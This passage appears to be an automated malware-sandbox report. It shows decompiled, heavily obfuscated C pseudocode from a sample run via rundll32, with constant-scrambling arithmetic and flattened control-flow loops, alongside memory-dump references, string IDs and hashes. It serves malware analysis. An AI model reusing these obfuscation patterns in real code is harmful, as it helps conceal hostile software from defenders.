				_v120 = _v120 << 0xe;
				_t343 = 0x61;
				_v120 = _v120 / _t343;
				_v120 = _v120 ^ 0xba448c5d;
				_v120 = _v120 ^ 0xbb13b056;
				_v100 = 0x5f60bb;
				_t344 = 0x67;
				_v100 = _v100 / _t344;
				_v100 = _v100 << 2;
				_v100 = _v100 << 0xe;
				_v100 = _v100 ^ 0xed0e0000;
				_v104 = 0xcda695;
				_t345 = 0x65;
				_v104 = _v104 * 0x11;
				_v104 = _v104 + 0xffffbfc8;
				_v104 = _v104 / _t345;
				_v104 = _v104 ^ 0x00229cab;
				_v88 = 0xcb9151;
				_v88 = _v88 + 0x59e9;
				_v88 = _v88 ^ 0x7c8ac0da;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x0007c412;
				_v124 = 0xc27732;
				_v124 = _v124 << 5;
				_v124 = _v124 * 0x69;
				_v124 = _v124 >> 0xd;
				_v124 = _v124 ^ 0x0007c2e3;
				_v108 = 0xd451e;
				_v108 = _v108 | 0x03d9c36b;
				_v108 = _v108 << 0x10;
				_v108 = _v108 >> 7;
				_v108 = _v108 ^ 0x018efe00;
				_v24 = 0xe3266e;
				_v24 = _v24 ^ 0xb39ac5a6;
				_v24 = _v24 ^ 0xb37ebd00;
				_v60 = 0xdd6dbc;
				_v60 = _v60 << 0xc;
				_v60 = _v60 >> 0xd;
				_v60 = _v60 ^ 0x00066ea0;
				_v92 = 0xdc27c1;
				_v92 = _v92 ^ 0xb7b3afa8;
				_t346 = 0x51;
				_v92 = _v92 / _t346;
				_v92 = _v92 >> 0xb;
				_v92 = _v92 ^ 0x000e15f4;
				_v28 = 0x55985f;
				_t347 = 0x64;
				_v28 = _v28 * 0x1f;
				_v28 = _v28 ^ 0x0a58c7ef;
				_v64 = 0x4cb0ae;
				_v64 = _v64 * 0x59;
				_v64 = _v64 + 0xffff44f7;
				_v64 = _v64 ^ 0x1aa02a50;
				_v32 = 0x4c255b;
				_v32 = _v32 >> 0xc;
				_v32 = _v32 ^ 0x000ba021;
				_v68 = 0x1bdf1a;
				_v68 = _v68 << 0xe;
				_v68 = _v68 << 8;
				_v68 = _v68 ^ 0xc683e60f;
				_v36 = 0xeace7c;
				_v36 = _v36 ^ 0x32d1e31b;
				_v36 = _v36 ^ 0x32395a0e;
				_v52 = 0x5778bf;
				_v52 = _v52 * 0x53;
				_v52 = _v52 ^ 0x1c501c28;
				_v56 = 0x56e07;
				_v56 = _v56 / _t347;
				_v56 = _v56 ^ 0x000a0e4e;
				_v128 = 0x2ec397;
				_v128 = _v128 + 0xffff4016;
				_v128 = _v128 ^ 0xc29a5f5c;
				_v128 = _v128 << 0xa;
				_v128 = _v128 ^ 0xd1754ce1;
				_v112 = 0x486dea;
				_t159 =  &_v112; // 0x486dea
				_t348 = 0x16;
				_v112 =  *_t159 * 0x75;
				_v112 = _v112 << 3;
				_v112 = _v112 + 0xffff4e4a;
				_v112 = _v112 ^ 0x08d01f1a;
				_v116 = 0xad5672;
				_v116 = _v116 << 0xa;
				_v116 = _v116 * 0x32;
				_v116 = _v116 >> 1;
				_v116 = _v116 ^ 0x35c1a461;
				_v40 = 0x750aef;
				_v40 = _v40 << 0xe;
				_v40 = _v40 ^ 0x42b6a378;
				_v72 = 0x7e8fee;
				_v72 = _v72 << 0xe;
				_v72 = _v72 + 0x885b;
				_v72 = _v72 ^ 0xa3f43c0d;
				_v44 = 0x717d1a;
				_v44 = _v44 >> 0xf;
				_v44 = _v44 ^ 0x000f68d6;
				_v48 = 0x815897;
				_v48 = _v48 / _t348;
				_v48 = _v48 ^ 0x000d4a68;
				_v76 = 0xfbb4ce;
				_v76 = _v76 << 8;
				_v76 = _v76 + 0xffffed69;
				_v76 = _v76 ^ 0xfbbe0169;
				_v80 = 0xf07394;
				_v80 = _v80 << 0xf;
				_v80 = _v80 ^ 0x34c45092;
				_v80 = _v80 ^ 0x0d009df4;
				_v84 = 0xfdde74;
				_v84 = _v84 * 0x78;
				_v84 = _v84 << 7;
				_v84 = _v84 << 0xa;
				_v84 = _v84 ^ 0x8cc67a91;
				_v20 = 0xbaf80d;
				_t349 = 0x4e;
				_v20 = _v20 / _t349;
				_v20 = _v20 ^ 0x000183d9;
				do {
					while(_t316 != 0x77ea95) {
						if(_t316 == 0x220b753) {
							_t301 =  *0x393dfc; // 0x0
							_t302 = E00385B3B(_t316, _v24,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t301 + 0x64)),  *_t342, _v60, _v92, _v96, _t340,  &_v12, _v100, _v104, _v28, _t316, _v64, _v32, _v68, _v36);
							_t352 =  &(_t352[0x10]);
							if(_t302 == _v88) {
								_t316 = 0xd86d689;
								continue;
							}
						} else {
							if(_t316 == 0xd7ced6e) {
								_t305 =  *0x393dfc; // 0x0
								_t306 = E00385B3B(_t316, _v112,  *((intOrPtr*)(_t342 + 4)),  *((intOrPtr*)(_t305 + 0x64)),  *_t342, _v116, _v40, _v120, _v16,  &_v12, _v12, _v124, _v72, _t316, _v44, _v48, _v76, _v80);
								_t352 =  &(_t352[0x10]);
								if(_t306 == _v108) {
									 *_t314 = _v16;
									_t340 = 1;
									 *((intOrPtr*)(_t314 + 4)) = _v12;
								} else {
									_t316 = 0xf392ab6;
									continue;
								}
							} else {
								if(_t316 == 0xd86d689) {
									_push(_t316);
									_push(_t316);
									_t312 = E00377FF2(_v12);
									_v16 = _t312;
									if(_t312 != 0) {
										_t316 = 0xd7ced6e;
										continue;
									}
								} else {
									if(_t316 != 0xf392ab6) {
										goto L14;
									} else {
										E00388519(_v84, _v20, _v16);
									}
								}
							}
						}
						L17:
						return _t340;
					}
					_t316 = 0x220b753;
					L14:
				} while (_t316 != 0xf4b6a65);
				goto L17;
			}




















































                                                                                                                                                            0x003770bc
                                                                                                                                                            0x003770c3
                                                                                                                                                            0x003770c6
                                                                                                                                                            0x003770cd
                                                                                                                                                            0x003770d4
                                                                                                                                                            0x003770d5
                                                                                                                                                            0x003770d6
                                                                                                                                                            0x003770d7
                                                                                                                                                            0x003770dc
                                                                                                                                                            0x003770e7
                                                                                                                                                            0x003770e9
                                                                                                                                                            0x003770f0
                                                                                                                                                            0x003770f3
                                                                                                                                                            0x003770fd
                                                                                                                                                            0x00377102
                                                                                                                                                            0x00377107
                                                                                                                                                            0x0037710f
                                                                                                                                                            0x00377117
                                                                                                                                                            0x0037711f
                                                                                                                                                            0x00377127
                                                                                                                                                            0x00377132
                                                                                                                                                            0x00377137
                                                                                                                                                            0x0037713d
                                                                                                                                                            0x00377145
                                                                                                                                                            0x0037714d
                                                                                                                                                            0x00377159
                                                                                                                                                            0x0037715e
                                                                                                                                                            0x00377164
                                                                                                                                                            0x00377169
                                                                                                                                                            0x0037716e
                                                                                                                                                            0x00377176
                                                                                                                                                            0x00377183
                                                                                                                                                            0x00377186
                                                                                                                                                            0x0037718a
                                                                                                                                                            0x00377198
                                                                                                                                                            0x0037719c
                                                                                                                                                            0x003771a4
                                                                                                                                                            0x003771ac
                                                                                                                                                            0x003771b4
                                                                                                                                                            0x003771bc
                                                                                                                                                            0x003771c1
                                                                                                                                                            0x003771c9
                                                                                                                                                            0x003771d1
                                                                                                                                                            0x003771db
                                                                                                                                                            0x003771df
                                                                                                                                                            0x003771e4
                                                                                                                                                            0x003771ec
                                                                                                                                                            0x003771f4
                                                                                                                                                            0x003771fc
                                                                                                                                                            0x00377201
                                                                                                                                                            0x00377206
                                                                                                                                                            0x0037720e
                                                                                                                                                            0x00377216
                                                                                                                                                            0x0037721e
                                                                                                                                                            0x00377226
                                                                                                                                                            0x0037722e
                                                                                                                                                            0x00377233
                                                                                                                                                            0x00377238
                                                                                                                                                            0x00377240
                                                                                                                                                            0x00377248
                                                                                                                                                            0x00377256
                                                                                                                                                            0x0037725b
                                                                                                                                                            0x00377261
                                                                                                                                                            0x00377266
                                                                                                                                                            0x0037726e
                                                                                                                                                            0x0037727b
                                                                                                                                                            0x0037727e
                                                                                                                                                            0x00377282
                                                                                                                                                            0x0037728a
                                                                                                                                                            0x00377297
                                                                                                                                                            0x0037729b
                                                                                                                                                            0x003772a3
                                                                                                                                                            0x003772ab
                                                                                                                                                            0x003772b3
                                                                                                                                                            0x003772b8
                                                                                                                                                            0x003772c0
                                                                                                                                                            0x003772c8
                                                                                                                                                            0x003772cd
                                                                                                                                                            0x003772d2
                                                                                                                                                            0x003772da
                                                                                                                                                            0x003772e2
                                                                                                                                                            0x003772ea
                                                                                                                                                            0x003772f2
                                                                                                                                                            0x003772ff
                                                                                                                                                            0x00377303
                                                                                                                                                            0x0037730b
                                                                                                                                                            0x0037731b
                                                                                                                                                            0x0037731f
                                                                                                                                                            0x00377327
                                                                                                                                                            0x0037732f
                                                                                                                                                            0x00377337
                                                                                                                                                            0x0037733f
                                                                                                                                                            0x00377344
                                                                                                                                                            0x0037734c
                                                                                                                                                            0x00377354
                                                                                                                                                            0x00377359
                                                                                                                                                            0x0037735a
                                                                                                                                                            0x0037735e
                                                                                                                                                            0x00377363
                                                                                                                                                            0x0037736b
                                                                                                                                                            0x00377373
                                                                                                                                                            0x0037737b
                                                                                                                                                            0x00377385
                                                                                                                                                            0x00377389
                                                                                                                                                            0x0037738d
                                                                                                                                                            0x00377395
                                                                                                                                                            0x0037739d
                                                                                                                                                            0x003773a2
                                                                                                                                                            0x003773aa
                                                                                                                                                            0x003773b2
                                                                                                                                                            0x003773b7
                                                                                                                                                            0x003773bf
                                                                                                                                                            0x003773c7
                                                                                                                                                            0x003773cf
                                                                                                                                                            0x003773d4
                                                                                                                                                            0x003773dc
                                                                                                                                                            0x003773ea
                                                                                                                                                            0x003773ee
                                                                                                                                                            0x003773f6
                                                                                                                                                            0x003773fe
                                                                                                                                                            0x00377403
                                                                                                                                                            0x0037740b
                                                                                                                                                            0x00377413
                                                                                                                                                            0x0037741b
                                                                                                                                                            0x00377420
                                                                                                                                                            0x00377428
                                                                                                                                                            0x00377430
                                                                                                                                                            0x0037743d
                                                                                                                                                            0x00377443
                                                                                                                                                            0x00377448
                                                                                                                                                            0x0037744d
                                                                                                                                                            0x00377455
                                                                                                                                                            0x00377463
                                                                                                                                                            0x0037746b
                                                                                                                                                            0x0037746f
                                                                                                                                                            0x00377477
                                                                                                                                                            0x00377477
                                                                                                                                                            0x00377485
                                                                                                                                                            0x00377592
                                                                                                                                                            0x003775a6
                                                                                                                                                            0x003775ab
                                                                                                                                                            0x003775b2
                                                                                                                                                            0x003775b4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003775b4
                                                                                                                                                            0x0037748b
                                                                                                                                                            0x00377491
                                                                                                                                                            0x00377531
                                                                                                                                                            0x00377542
                                                                                                                                                            0x00377547
                                                                                                                                                            0x0037754e
                                                                                                                                                            0x003775d7
                                                                                                                                                            0x003775d9
                                                                                                                                                            0x003775e1
                                                                                                                                                            0x00377550
                                                                                                                                                            0x00377550
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377550
                                                                                                                                                            0x00377493
                                                                                                                                                            0x00377499
                                                                                                                                                            0x003774d4
                                                                                                                                                            0x003774d5
                                                                                                                                                            0x003774d6
                                                                                                                                                            0x003774db
                                                                                                                                                            0x003774e6
                                                                                                                                                            0x003774ec
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003774ec
                                                                                                                                                            0x0037749b
                                                                                                                                                            0x003774a1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x003774a7
                                                                                                                                                            0x003774b6
                                                                                                                                                            0x003774bb
                                                                                                                                                            0x003774a1
                                                                                                                                                            0x00377499
                                                                                                                                                            0x00377491
                                                                                                                                                            0x003775e4
                                                                                                                                                            0x003775f0
                                                                                                                                                            0x003775f0
                                                                                                                                                            0x003775be
                                                                                                                                                            0x003775c0
                                                                                                                                                            0x003775c0
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: [%L$hJ$n&$n|$n|$u$Y$mH
                                                                                                                                                            • API String ID: 0-2314355462
                                                                                                                                                            • Opcode ID: bc57560a37894aac4829d5467682d3cffdae0f3724cb4e1124b770e7585cf60c
                                                                                                                                                            • Instruction ID: 6e257dc212e2f0a4f3eb1e1aad0e7977bd96435b6817beb1ff51d3c49a9138de
                                                                                                                                                            • Opcode Fuzzy Hash: bc57560a37894aac4829d5467682d3cffdae0f3724cb4e1124b770e7585cf60c
                                                                                                                                                            • Instruction Fuzzy Hash: 91D10E7110C3819FC765CF66C88995BFBE2BBC4748F50891DF2A68A220C7B6C949CF42
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0038C631 Relevance: 10.2, Strings: 8, Instructions: 218COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                            			E0038C631(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				void* _t214;
				void* _t220;
				void* _t224;
				void* _t228;
				void* _t229;
				void* _t233;
				void* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				void* _t248;
				void* _t249;
				signed int* _t251;
				void* _t254;

				_t251 =  &_v92;
				_t234 = __ecx;
				_v56 = 0x6c25e6;
				_v56 = _v56 >> 0xf;
				_v56 = _v56 >> 0xd;
				_v56 = _v56 ^ 0x000b07b8;
				_v60 = 0xfeb19f;
				_v60 = _v60 | 0xe5cfed25;
				_v60 = _v60 ^ 0x26a25afc;
				_v60 = _v60 ^ 0xc355f8a5;
				_v20 = 0x71f317;
				_v20 = _v20 >> 1;
				_v20 = _v20 ^ 0x003a157d;
				_v64 = 0x229c82;
				_v64 = _v64 >> 6;
				_v64 = _v64 + 0x6845;
				_v64 = _v64 ^ 0x000e1a2d;
				_v80 = 0xaa3c23;
				_v80 = _v80 + 0x9f20;
				_v80 = _v80 + 0x8b23;
				_v80 = _v80 | 0x21cd8be9;
				_v80 = _v80 ^ 0x21ed2977;
				_v84 = 0xa275e1;
				_v84 = _v84 >> 0xd;
				_t248 = 0;
				_t236 = 0x36;
				_v84 = _v84 / _t236;
				_v84 = _v84 | 0x6f301759;
				_t249 = 0xe982267;
				_v84 = _v84 ^ 0x6f339045;
				_v88 = 0x6e61be;
				_v88 = _v88 ^ 0xaf54e0d1;
				_v88 = _v88 >> 4;
				_v88 = _v88 | 0xfa70c1e6;
				_v88 = _v88 ^ 0xfaf0db59;
				_v8 = 0x2c245a;
				_v8 = _v8 << 8;
				_v8 = _v8 ^ 0x2c2bf9b3;
				_v36 = 0xcb696d;
				_v36 = _v36 >> 4;
				_v36 = _v36 << 5;
				_v36 = _v36 ^ 0x019dc7aa;
				_v76 = 0xb5019c;
				_v76 = _v76 + 0xffffd3ce;
				_t237 = 0x3a;
				_v76 = _v76 / _t237;
				_v76 = _v76 + 0xe675;
				_v76 = _v76 ^ 0x000db5c6;
				_v40 = 0x1e681a;
				_t238 = 0x22;
				_v40 = _v40 / _t238;
				_v40 = _v40 + 0x9449;
				_v40 = _v40 ^ 0x00094c29;
				_v12 = 0x15a3d6;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x096cbb26;
				_v44 = 0x420567;
				_v44 = _v44 * 0x2b;
				_v44 = _v44 >> 8;
				_v44 = _v44 ^ 0x0004b329;
				_v24 = 0xd75fdc;
				_v24 = _v24 + 0x1e6b;
				_v24 = _v24 ^ 0x00df7832;
				_v92 = 0x2978f4;
				_v92 = _v92 ^ 0x1aa3462f;
				_v92 = _v92 * 0x3a;
				_v92 = _v92 | 0xa828e589;
				_v92 = _v92 ^ 0xab738ef3;
				_v28 = 0xea47cd;
				_v28 = _v28 * 0x68;
				_v28 = _v28 ^ 0x5f2069e4;
				_v16 = 0x52c32f;
				_v16 = _v16 | 0xda6d254c;
				_v16 = _v16 ^ 0xda7308ab;
				_v48 = 0xc39de2;
				_v48 = _v48 ^ 0x402eeacb;
				_v48 = _v48 + 0xb85a;
				_v48 = _v48 ^ 0x40eaab85;
				_v52 = 0xbb994d;
				_v52 = _v52 | 0x0bb22e40;
				_v52 = _v52 ^ 0x7c36a9dd;
				_v52 = _v52 ^ 0x7782b78d;
				_v68 = 0x6ee7f1;
				_v68 = _v68 * 3;
				_v68 = _v68 * 0x65;
				_v68 = _v68 + 0xffffc283;
				_v68 = _v68 ^ 0x834839c0;
				_v4 = 0x2c076e;
				_v4 = _v4 >> 2;
				_v4 = _v4 ^ 0x00027705;
				_v32 = 0x2be47d;
				_v32 = _v32 >> 3;
				_v32 = _v32 << 0x10;
				_v32 = _v32 ^ 0x7c8953c8;
				_v72 = 0x664751;
				_v72 = _v72 + 0xffffb67a;
				_v72 = _v72 + 0xf05a;
				_v72 = _v72 + 0xffff370a;
				_v72 = _v72 ^ 0x0066b29b;
				goto L1;
				do {
					while(1) {
						L1:
						_t254 = _t249 - 0xe145aac;
						if(_t254 > 0) {
							break;
						}
						if(_t254 == 0) {
							_push(_t238);
							_push(_t238);
							_t220 = E0037474B();
							_t251 =  &(_t251[2]);
							_t249 = 0x70e2d06;
							_t248 = _t248 + _t220;
							continue;
						} else {
							if(_t249 == 0x15047ce) {
								_push(_t238);
								_push(_t238);
								_t224 = E0037474B();
								_t251 =  &(_t251[2]);
								_t249 = 0xe32aaf2;
								_t248 = _t248 + _t224;
								continue;
							} else {
								if(_t249 == 0x4d33fe3) {
									_push(_t238);
									_push(_t238);
									_t228 = E0037474B();
									_t251 =  &(_t251[2]);
									_t249 = 0xe45b300;
									_t248 = _t248 + _t228;
									continue;
								} else {
									if(_t249 == 0x708a22e) {
										_t238 = _v56;
										_t229 = E0038C2F8(_t238, _t234 + 0x1c, _v60, _v20, _v64);
										_t251 =  &(_t251[3]);
										_t249 = 0x15047ce;
										_t248 = _t248 + _t229;
										continue;
									} else {
										if(_t249 != 0x70e2d06) {
											goto L17;
										} else {
											_push(_t238);
											_push(_t238);
											_t233 = E0037474B();
											_t251 =  &(_t251[2]);
											_t249 = 0x4d33fe3;
											_t248 = _t248 + _t233;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t248;
					}
					if(_t249 == 0xe32aaf2) {
						_push(_t238);
						_push(_t238);
						_t214 = E0037474B();
						_t251 =  &(_t251[2]);
						_t249 = 0xe145aac;
						_t248 = _t248 + _t214;
						goto L17;
					} else {
						if(_t249 == 0xe45b300) {
							_t248 = _t248 + E0038C2F8(_v68, _t234 + 0x14, _v4, _v32, _v72);
						} else {
							if(_t249 != 0xe982267) {
								goto L17;
							} else {
								_t249 = 0x708a22e;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t249 != 0xce30a1f);
				goto L20;
			}








































                                                                                                                                                            0x0038c631
                                                                                                                                                            0x0038c638
                                                                                                                                                            0x0038c63a
                                                                                                                                                            0x0038c644
                                                                                                                                                            0x0038c649
                                                                                                                                                            0x0038c64e
                                                                                                                                                            0x0038c656
                                                                                                                                                            0x0038c65e
                                                                                                                                                            0x0038c666
                                                                                                                                                            0x0038c66e
                                                                                                                                                            0x0038c676
                                                                                                                                                            0x0038c67e
                                                                                                                                                            0x0038c682
                                                                                                                                                            0x0038c68a
                                                                                                                                                            0x0038c692
                                                                                                                                                            0x0038c697
                                                                                                                                                            0x0038c69f
                                                                                                                                                            0x0038c6a7
                                                                                                                                                            0x0038c6af
                                                                                                                                                            0x0038c6b7
                                                                                                                                                            0x0038c6bf
                                                                                                                                                            0x0038c6c7
                                                                                                                                                            0x0038c6cf
                                                                                                                                                            0x0038c6d7
                                                                                                                                                            0x0038c6e2
                                                                                                                                                            0x0038c6e4
                                                                                                                                                            0x0038c6e9
                                                                                                                                                            0x0038c6ef
                                                                                                                                                            0x0038c6f7
                                                                                                                                                            0x0038c6fc
                                                                                                                                                            0x0038c704
                                                                                                                                                            0x0038c70c
                                                                                                                                                            0x0038c714
                                                                                                                                                            0x0038c719
                                                                                                                                                            0x0038c721
                                                                                                                                                            0x0038c729
                                                                                                                                                            0x0038c731
                                                                                                                                                            0x0038c736
                                                                                                                                                            0x0038c73e
                                                                                                                                                            0x0038c746
                                                                                                                                                            0x0038c74b
                                                                                                                                                            0x0038c750
                                                                                                                                                            0x0038c758
                                                                                                                                                            0x0038c760
                                                                                                                                                            0x0038c76c
                                                                                                                                                            0x0038c771
                                                                                                                                                            0x0038c777
                                                                                                                                                            0x0038c77f
                                                                                                                                                            0x0038c787
                                                                                                                                                            0x0038c793
                                                                                                                                                            0x0038c796
                                                                                                                                                            0x0038c79a
                                                                                                                                                            0x0038c7a2
                                                                                                                                                            0x0038c7aa
                                                                                                                                                            0x0038c7b7
                                                                                                                                                            0x0038c7bb
                                                                                                                                                            0x0038c7c3
                                                                                                                                                            0x0038c7d0
                                                                                                                                                            0x0038c7d4
                                                                                                                                                            0x0038c7d9
                                                                                                                                                            0x0038c7e1
                                                                                                                                                            0x0038c7e9
                                                                                                                                                            0x0038c7f1
                                                                                                                                                            0x0038c7f9
                                                                                                                                                            0x0038c801
                                                                                                                                                            0x0038c813
                                                                                                                                                            0x0038c817
                                                                                                                                                            0x0038c81f
                                                                                                                                                            0x0038c827
                                                                                                                                                            0x0038c834
                                                                                                                                                            0x0038c838
                                                                                                                                                            0x0038c840
                                                                                                                                                            0x0038c848
                                                                                                                                                            0x0038c850
                                                                                                                                                            0x0038c858
                                                                                                                                                            0x0038c860
                                                                                                                                                            0x0038c868
                                                                                                                                                            0x0038c870
                                                                                                                                                            0x0038c878
                                                                                                                                                            0x0038c880
                                                                                                                                                            0x0038c888
                                                                                                                                                            0x0038c890
                                                                                                                                                            0x0038c898
                                                                                                                                                            0x0038c8a5
                                                                                                                                                            0x0038c8ae
                                                                                                                                                            0x0038c8b2
                                                                                                                                                            0x0038c8ba
                                                                                                                                                            0x0038c8c2
                                                                                                                                                            0x0038c8ca
                                                                                                                                                            0x0038c8cf
                                                                                                                                                            0x0038c8d7
                                                                                                                                                            0x0038c8df
                                                                                                                                                            0x0038c8e4
                                                                                                                                                            0x0038c8e9
                                                                                                                                                            0x0038c8f1
                                                                                                                                                            0x0038c8f9
                                                                                                                                                            0x0038c901
                                                                                                                                                            0x0038c909
                                                                                                                                                            0x0038c911
                                                                                                                                                            0x0038c911
                                                                                                                                                            0x0038c919
                                                                                                                                                            0x0038c919
                                                                                                                                                            0x0038c919
                                                                                                                                                            0x0038c919
                                                                                                                                                            0x0038c91b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c921
                                                                                                                                                            0x0038c9e2
                                                                                                                                                            0x0038c9e3
                                                                                                                                                            0x0038c9e4
                                                                                                                                                            0x0038c9e9
                                                                                                                                                            0x0038c9ec
                                                                                                                                                            0x0038c9f1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c927
                                                                                                                                                            0x0038c92d
                                                                                                                                                            0x0038c9c0
                                                                                                                                                            0x0038c9c1
                                                                                                                                                            0x0038c9c2
                                                                                                                                                            0x0038c9c7
                                                                                                                                                            0x0038c9ca
                                                                                                                                                            0x0038c9cf
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c933
                                                                                                                                                            0x0038c939
                                                                                                                                                            0x0038c99e
                                                                                                                                                            0x0038c99f
                                                                                                                                                            0x0038c9a0
                                                                                                                                                            0x0038c9a5
                                                                                                                                                            0x0038c9a8
                                                                                                                                                            0x0038c9ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c93b
                                                                                                                                                            0x0038c941
                                                                                                                                                            0x0038c97d
                                                                                                                                                            0x0038c981
                                                                                                                                                            0x0038c986
                                                                                                                                                            0x0038c989
                                                                                                                                                            0x0038c98e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c943
                                                                                                                                                            0x0038c949
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c94f
                                                                                                                                                            0x0038c95b
                                                                                                                                                            0x0038c95c
                                                                                                                                                            0x0038c95d
                                                                                                                                                            0x0038c962
                                                                                                                                                            0x0038c965
                                                                                                                                                            0x0038c96a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038c96a
                                                                                                                                                            0x0038c949
                                                                                                                                                            0x0038c941
                                                                                                                                                            0x0038c939
                                                                                                                                                            0x0038c92d
                                                                                                                                                            0x0038ca5f
                                                                                                                                                            0x0038ca68
                                                                                                                                                            0x0038ca68
                                                                                                                                                            0x0038c9fe
                                                                                                                                                            0x0038ca26
                                                                                                                                                            0x0038ca27
                                                                                                                                                            0x0038ca28
                                                                                                                                                            0x0038ca2d
                                                                                                                                                            0x0038ca30
                                                                                                                                                            0x0038ca32
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ca00
                                                                                                                                                            0x0038ca06
                                                                                                                                                            0x0038ca5d
                                                                                                                                                            0x0038ca08
                                                                                                                                                            0x0038ca0e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ca10
                                                                                                                                                            0x0038ca10
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ca10
                                                                                                                                                            0x0038ca0e
                                                                                                                                                            0x0038ca06
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038ca34
                                                                                                                                                            0x0038ca34
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: )L$Eh$QGf$Z$,$w)!$}+$%l$i _
                                                                                                                                                            • API String ID: 0-1553751006
                                                                                                                                                            • Opcode ID: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                                            • Instruction ID: b19b35f7d0bdfacb135718fe9c209521fa55c27f02ef37cac8b4b0071cfc93a2
                                                                                                                                                            • Opcode Fuzzy Hash: 24a842ca848367424d792b2c1ed1d107ee6d6e6c77a466d1125fff4a40fa415b
                                                                                                                                                            • Instruction Fuzzy Hash: C6A141B28183409FC358DF65D48A80FFBE0BBC5748F015A5DF595A6220D3B5DA08CF92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037D6D8 Relevance: 9.2, Strings: 7, Instructions: 408COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 89%
                                                                                                                                                            			E0037D6D8(intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				intOrPtr _v152;
				signed int _v156;
				intOrPtr _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* __ecx;
				intOrPtr _t400;
				void* _t407;
				signed int _t410;
				intOrPtr _t421;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t431;
				signed int _t432;
				signed int _t433;
				intOrPtr _t434;
				void* _t473;
				intOrPtr* _t482;
				signed int _t485;
				signed int* _t491;
				void* _t493;

				_push(_a16);
				_push(_a12);
				_v16 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003820B9(__edx);
				_v72 = 0xfd05e7;
				_t491 =  &(( &_v192)[6]);
				_v72 = _v72 | 0xfdc7c414;
				_v72 = _v72 ^ 0xfdffc5f6;
				_t489 = 0;
				_v128 = 0x159cf;
				_t421 = 0;
				_v128 = _v128 + 0x2543;
				_t485 = 0x8939926;
				_v128 = _v128 ^ 0xc1c453fb;
				_v128 = _v128 ^ 0xc1c52ce8;
				_v188 = 0xc0a375;
				_t423 = 0x5a;
				_v188 = _v188 / _t423;
